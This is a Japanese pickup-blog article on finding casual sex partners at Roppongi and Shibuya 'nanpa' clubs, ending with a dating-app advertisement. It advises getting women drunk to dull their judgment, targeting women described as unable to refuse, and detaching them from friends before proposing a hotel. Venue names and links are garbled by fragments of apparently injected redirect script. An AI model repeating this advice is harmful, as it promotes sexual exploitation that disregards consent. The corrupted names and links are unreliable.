クラブでセフレを作る方法とは|6つのポイントを紹介

  • このエントリーをはてなブックマークに追加
  • Pocket

ストリートナンパ、ネットナンパと並び称される「クラブナンパ」。代表的なナンパスポットの一つということもあり、クラブでセフレを作る人はたくさんいます。

実際、クラブにいる女の子ってエロく見えますよね!ノリも良くて露出も多い。しかも若い子が多いのでセフレを作るにはもってこいの場所です。

知ってる人もいるかもしれませんが、クラブは箱の特徴によって雰囲気がかなり違います。いわゆる「音楽箱」では音楽や踊りを目的とした女の子が集まるためナンパにはおすすめできません。

一方で「ナンパ箱」は読んで字の如く、ナンパをすること・されることを目的とした人が多く集まるクラブです。ここに来る女の子は、ナンパされたいと思っているエロい子が多いため、非常にナンパがしやすいのが特徴です。

今回はこのナンパ箱のクラブで簡単にセフレを作る方法を紹介します。ナンパ箱には非常にたくさんのライバルがいます。このライバルに勝つことができる=セフレをゲットできるかなので、しっかりと読み込んでからクラブに出かけましょう!

クラブでセフレが作りやすい理由

クラブにはナンパをされる前提で来ている女の子も多く、性に積極的でエロい女の子がたくさんいます。それだけで簡単にセフレができそうなイメージがありますが、それだけではありません。

クラブにはセフレができやすくなる仕掛けが他にもあるのです。ここではクラブでセフレが作りやすい理由を紹介していきます。

クラブにいる大抵の女の子がすでにお酒を飲んでいる

お酒はセフレを作る上では欠かせない重要アイテムです。お酒を飲むと酔って気分が大きくなり判断力が鈍ります。特にクラブに来る女の子はノリの良い子が多く、さらにほとんどの子が酔払っているので声をかけたときに気軽に応じてくれるケースが多いです。

さらに酔っ払っているため、話も広がりやすいです。物事を深く考えることができなくなるので、ノリだけで会話ができてしまうからです。そこで女の子を楽しませることができれば、そのノリでホテルへ…なんてことも少なくありません。

クラブにはセフレになりやすい特徴をもった女の子が集まる

「ナンパ箱」と言われていることからわかる通り、ナンパ箱のクラブではナンパをするという目的で来る男が多いです。そのため、そこに来る女の子もナンパされることをわかった上で来ている、いわゆる「ナンパ待ち」の子が多いです。そのような女の子は性に対して開放的で、セフレという関係でも抵抗がないため、その中からセフレ候補を探すのは効率が良いと言えます。

またクラブに来るナンパ待ちの女の子は、1人で夜を過ごすのが嫌で、ノリの良い人達と大音量の音楽で騒いで気を紛らわせようとする寂しがりやの子が多いです。そのような子は押しに弱い傾向にあります。

「クラブに行くような女の子が、押しに弱いように見えない!」と思う方もいるかもしれませんが、実際クラブに来る子はその場の流れや空気を大事にするためNOと言えない子が多いのです。実はこの「寂しがりや」で「押しに弱い」女の子は、セフレになりやすい子の特徴と全く同じです。

「寂しがりや」の女の子は寂しさという精神的な不安をセックスという肉体的なつながりで埋めようと考え、また「押しに弱い」タイプは、「断るとせっかくの楽しい雰囲気を壊してしまうかも」と考えて、そのまま2回、3回とセックスを重ねてセフレになっていきます。

あくまでこれは一例で、セフレになりやすい女の子の特徴はもっとあります。さらに詳しく知りたいからは、こちらの記事も読んでみてください。

《関連記事》
セフレになりやすい女の子の特徴15個を大公開!

クラブでセフレを作る6つのポイント

クラブがいかにセフレ作りに向いている場所であるか、わかってもらえたでしょうか。しかし、それを知っているだけではセフレを作ることはできません。ここからは、どうすればクラブでセフレが作ることができるのか、6つのポイントに分けて紹介していきます。

これを知っているのと知らないのでは、セフレ作りの難易度がかなり変わってきます。しっかり読み込んで確実にセフレをGETできるようにしましょう。

1.セフレになりやすい子が集まるナンパ箱に行く

セフレを作る目的でクラブに行く場合、必ず「ナンパ箱」に行くようにしましょう。おすすめのエリアは、渋谷か六本木です。むしろナンパ箱はそのどちらかにしかないと言っても過言ではありません。今回はその中で僕が特におすすめするナンパ箱を3つ紹介します。

DiA dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokyo(六本木)

Dia東京は2016年に六本木にできた比較的新しいクラブです。メインとなる2階のクラブ空間では、開放的な高い天井に、きらびやかなLEDライトやプロジェクションマッピングなど派手な演出が多く、テンションが上がること間違いなしです!まだナンパしている人も少なくライバルが少ないためナンパ慣れしていない女の子をセフレにしたい人におすすめです。

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokyo.com/”>DiA dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokyo公式サイトはこちら

V2 TOKYO(六本木)

六本木のナンパ箱といえばここV2。広々としたメインフロアは開放的で、常に満員の人でにぎわっています。ナンパ箱として有名なので、女の子もナンパをされる目的で来る子が多く、セフレを探すにはもってこいの場所です。

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokyo.com/nightclub/”>V2 TOKYO公式サイトはこちら

ATOM TOKYO(渋谷)

クラブナンパといえば、渋谷のアトム。東京で一番有名なナンパ箱と言っても過言ではありません。ここに来る女の子のほとんどがナンパされる目的で、びっくりするくらいノリの軽い女の子が多いです。アトムの周りはラブホ街となっているため、「アトムでナンパしてからのラブホでセックス」という流れが確立しています。

dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom-dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokyo.com/”>ATOM TOKYO公式サイトはこちら

2.クラブへは週末に行く

次の日に仕事や学校があったら、夜遅くまではしゃげないですよね。そのためクラブへは必ず金曜日か土曜日にいきましょう。次の日が休みの女の子は、気持ちが開放的なのでホテルや次の店に誘いやすく、当然金曜と土曜の方が女の子の人数も多いのでおすすめです。

女の子の人数が多いということは、セフレになりやすい女の子の数も多いということなので、セフレが見つかるチャンスが広がります。

3.気になる子がいたらフランクに声をかける

行ったことがある人ならわかると思いますが、ナンパ箱ではそこらじゅうにナンパする男がいます。目当ての女の子がいても、うかうかしているとライバルに取られてしまうので、気になる子がいたら躊躇することなく話しかけましょう。

この時フロアで踊ってる子に声をかけてはダメです。フロアで踊ってる女の子は音楽に集中していたり、とにかく騒ぎたいだけということが多く、声をかけても会話に繋がりません。なので、ラウンジで休憩している子に話しかけるようにしましょう。

ナンパ箱に来る女の子はノリが良い子が多いので、声のかけ方もノリ良くいきましょう。

「今日いい感じ!?何飲んでんの?」「名前なんて言うの?〇〇ちゃんめちゃめちゃ可愛いよね!」など、とにかくノリが良くて楽しいやつだと思ってもらえばOKです!楽しいやつだとさえ思ってもらえれば、クラブではそれだけで一緒にいてくれるきっかけになります。普段の真面目さは捨ててノリに身を捧げましょう。

4.会話の最中にお酒をおごってあげる

声をかけて、その後会話に繋がったら、話している最中にお酒を奢ってあげましょう。「あれ、グラス空じゃん。もっと飲もうよ!」「いいよ、俺が出すから。何がいい?」など、自分から率先してお酒を飲ませるようにしましょう。

ナンパ箱に来る女の子で奢ってもらうのが嫌いな女の子はいません!お酒のペースを速めることで酔払い、判断力を下げることもできますし、お酒を奢ることでさらに長い時間会話ができるようになります。

また女の子としても、「お酒を奢ってもらった人を無下にできない」と感じるようになります。これは、営業やマーケティングにも良く使われる心理学テクニックで「返報制の法則」と言います。

人は他人から何かをもらったら、それに対してお返しをしなければならないという感情を抱きます。例えばスーパーの試食で、無料で配られた食品を食べた場合、味がそこまでおいしくなくてもその商品を買ってしまうことがありますよね。お酒を奢るのもこれと同じで、「お酒を奢ってもらったから、次の店くらいは行ってあげようかな」と感じるようになり、そこからセフレにするチャンスが広がります。

5.主導権を握っている方をより楽しませてあげる

多くの女の子は1人でクラブに来ることはありません。だいたいが2人以上のグループで来ていることが多いです。もしあなたが2人組の女の子にナンパした場合、主導権を握っている女の子をより楽しませましょう。

一見狙っていない子を楽しませることに何の意味があるのか疑問に思う方もいるかもしれません。しかし、急がば回れということわざにもあるように、最終的にセフレを作ることを考えた時、これはとても重要なポイントなのです。

女の子は非常に仲間意識が強い生き物です。片方の女の子が帰ると言い出すとそれにつられて目当ての女の子も帰ってしまう可能性があります。目当ての子ばかりを口説いてつまらないと思われないように、褒める、質問する、いじるなど、しっかりと楽しませてあげましょう。

6.会話がある程度盛り上がったら外へ連れ出す

女の子との会話がある程度盛り上がったら外に連れ出しましょう。この時、雰囲気次第では思い切ってホテルに誘うのもありですが、お酒が飲める居酒屋かカジュアルなバーに行くのが無難です。先程も伝えましたが、女の子は2人以上であることが多いです。もしホテルに誘う場合、一緒に来ている友達を剥がす必要があるので、一度飲み屋を挟んでタイミングを見計らうことをおすすめします。

飲み屋で意気投合したら、あとはホテルに直行です!ナンパ箱に来る女の子は、一夜限りのセックスに抵抗がないので、ここまでくれば拒否されることが滅多にありません。理性を忘れ本能のままにセックスを楽しみましょう。

この時、ホテルに行ったとしても飲み屋に行ったとしても連絡先を交換することだけは忘れてはいけません。皆さんの目的は一夜限りの相手ではありません。継続的に性欲を満たすことができるセフレですよね。クラブのラウンジ、飲み屋、ホテル…どこでも構わないので、絶対に連絡先を交換するようにしましょう。

クラブで出会った可愛いくてエロい子をセフレにしよう

ナンパ箱のクラブには、ナンパ目的で来る男も多く、競争率が高いのも事実です。しかし、多くのライバルはコツを知らないまま手当たり次第に声をかけるだけです。

今回紹介した6つのポイントを知っているあなたは、そんなライバルたちと比べてかなりのアドバンテージがあります!ここで伝えたことをしっかりと実践すれば、クラブで出会った女の子を意外なほど簡単にセフレにすることができます。早速、次回クラブに行った時から意識してみてください。

あなたがクラブで可愛くてエロいセフレをGETすることを陰ながら応援しています。

編集長おすすめの出会い系「PCMAX」

編集長みさわおすすめのマッチングアプリ「PCMAX」。

PCMAXを使った2020年の実績は、お持ち帰りした女の子22人。その中でセフレになった女の子10人です。

ナンパより効率的、クラブより低コスト。たくさんの女の子とワンナイトしたい、何人かの可愛いセフレが欲しい人にはぜひおすすめ。

登録は無料。攻略法さえ理解していれば、スタートダッシュ特典を使って2,000円で1人の女の子とセックスできます。まずは行動あるのみ。下のボタンから使ってみましょう!

PCMAXを使ってみる(R18)

おすすめの記事

  • このエントリーをはてなブックマークに追加
  • Pocket

SNSでもご購読できます。